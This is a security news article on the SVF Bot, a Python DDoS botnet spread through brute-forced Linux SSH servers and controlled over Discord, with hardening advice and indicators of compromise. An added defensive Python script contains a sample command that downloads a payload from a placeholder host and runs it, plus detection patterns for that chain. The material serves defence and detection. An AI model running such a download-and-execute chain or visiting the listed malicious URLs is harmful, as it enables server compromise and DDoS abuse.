Cybercriminals Exploiting Linux SSH Servers to Launch SVF Botnet

DDoS botnet malware known as “SVF Bot” is being used by threat actors in a recent wave of attacks against insufficiently secured Linux SSH servers.

Security intelligence experts at AhnLab Security Intelligence Center (ASEC), monitoring a global network of SSH honeypots, have observed significant activity involving the SVF Botnet.

This sophisticated malware, developed in Python and managed remotely through Discord, illustrates the evolving tactics cybercriminals are now employing against Internet-facing infrastructure that uses weak or default credentials.

Discord as Command Hub

The infection begins when attackers gain unauthorized SSH access by brute-forcing credentials on vulnerable Linux servers.

The entire infection chain can be executed with a single shell command line: the attacker creates a Python virtual environment, installs the necessary Python libraries (including Discord.py for C&C operations, alongside requests, aiohttp, lxml), downloads the SVF Bot’s malicious payload, and immediately executes it.

The bot authenticates itself to a Discord server using a hard-coded token, effectively turning Discord into its command-and-control (C&C) backend.

Using this platform, threat actors can issue instructions to the bot, manage infected hosts, and organize attacks by grouping bots with parameters such as server IDs supplied at runtime.

On activation, the SVF Bot notifies operators via a Discord webhook, sending basic information like the server identifier.

[Figure: SVF Bot attacking Linux SSH servers]

It supports multiple DDoS attack vectors, with the primary methods being L7 HTTP Floods and L4 UDP Floods.

Among the notable features is its advanced proxy management for HTTP-based attacks: SVF Bot automatically scrapes proxy IP addresses from multiple reputable online sources, validates them in real time by connecting to Google through them, and employs the working ones to route attack traffic.

This approach not only obscures the attackers’ true origin but also dramatically increases the botnet’s disruptive power during coordinated DDoS campaigns.

Streamlined DDoS Operations

The SVF Bot boasts a range of remote commands sent via Discord, allowing operators to manage DDoS methods, load and reset proxy lists, initiate floods with fully customizable parameters, and forcibly update, crash, or stop bots as needed.

The streamlined and modular command structure allows even low-skilled actors to run large-scale attacks with minimal effort.

This ease of deployment, coupled with the malware’s ability to self-update and reinstall via alternative URLs or new Python payloads, poses an enduring challenge for defenders.

ASEC’s analysis indicates that the SVF Botnet is primarily leveraged for disruptive campaigns but could easily evolve to incorporate additional payloads or functions, given its Python base and C&C flexibility.

The malware operators’ use of evolving distribution URLs, as well as Discord’s wide adoption and low barrier for C&C management, further complicates detection and take-down efforts.

The persistence of attacks exploiting SSH with weak credentials reiterates the critical need for robust server hardening.

According to the report, security experts strongly advise system administrators to enforce strong, unique passwords, update all software to the latest secure versions, and restrict SSH access to trusted sources, preferably by firewall policy, rather than exposing services unnecessarily to the public Internet.

Deploying up-to-date endpoint defense solutions and continuously monitoring for suspicious activity remain foundational best practices against both brute-force and remote exploitation attempts.
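The monitoring recommended above, as an added example that is not part of the ASEC report or of this article: a small Python script (Python being the language the bot itself is written in) that counts failed SSH logins per source IP in sshd log lines, and flags a shell command line that combines all four stages of the installation chain described earlier (venv creation, pip install of the Discord/aiohttp libraries, payload download, Python execution). All log lines, command lines and the payload host are constructed samples, not data from the report.

```python
import re
from collections import Counter

# Matches sshd failure lines and captures the source IP.
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?\S+ from (\d+\.\d+\.\d+\.\d+)")

def brute_force_sources(lines, threshold=5):
    """Return {ip: failures} for source IPs at or above the threshold."""
    counts = Counter()
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            counts[m.group(1)] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}

# The four stages of the single-command chain described in the article:
# venv creation, pip install of the C&C libraries, payload download, execution.
STAGES = {
    "venv": re.compile(r"python3?\s+-m\s+venv\b|\bvirtualenv\b"),
    "pip": re.compile(r"\bpip3?\s+install\b.*\b(?:discord(?:\.py)?|aiohttp)\b"),
    "download": re.compile(r"\b(?:curl|wget)\b.*https?://"),
    "execute": re.compile(r"\bpython3?\s+\S+\.py\b"),
}

def is_svf_like_chain(cmdline):
    """True only when one command line contains every stage of the chain."""
    return all(p.search(cmdline) for p in STAGES.values())

# Constructed sample data (not real attack data); the payload host is a placeholder.
SAMPLE_AUTH_LOG = [
    f"Jan 10 03:14:{s:02d} host sshd[12{s:02d}]: Failed password for root "
    f"from 203.0.113.7 port 5{s:04d} ssh2" for s in range(6)
] + [
    "Jan 10 03:15:00 host sshd[1300]: Failed password for invalid user admin "
    "from 198.51.100.3 port 40000 ssh2",
    "Jan 10 03:15:09 host sshd[1301]: Accepted publickey for ops from 192.0.2.10 port 40100 ssh2",
]
SUSPICIOUS_CMD = ("python3 -m venv /tmp/.v && /tmp/.v/bin/pip install discord.py requests aiohttp lxml"
                  " && wget -q http://PAYLOAD-HOST-PLACEHOLDER/svf.py -O /tmp/.v/svf.py"
                  " && /tmp/.v/bin/python /tmp/.v/svf.py")
BENIGN_CMD = "python3 -m venv venv && venv/bin/pip install requests && venv/bin/python app.py"

if __name__ == "__main__":
    print("brute-force sources:", brute_force_sources(SAMPLE_AUTH_LOG))
    print("suspicious chain:", is_svf_like_chain(SUSPICIOUS_CMD))
    print("benign chain:", is_svf_like_chain(BENIGN_CMD))
```

In practice the command lines would come from auditd execve records or shell history, and the threshold and window should be tuned to the host's normal login volume.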

As SVF Bot continues to evolve and propagate, the case serves as a stark reminder that DDoS botnets are not limited to Windows platforms or legacy binaries.

The modern-era botnet leverages cross-platform scripting, dynamic proxy infrastructures, and popular communication platforms to build resilient malware ecosystems.

Indicators of Compromise (IOC)

Type   Value
MD5    cffe3fb6cb3e4b9b453c4147bdcd8c12
URL    http://146.59.239.144:55/
URL    https://termbin.com/4ccx
IP     185.254.75.44

Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
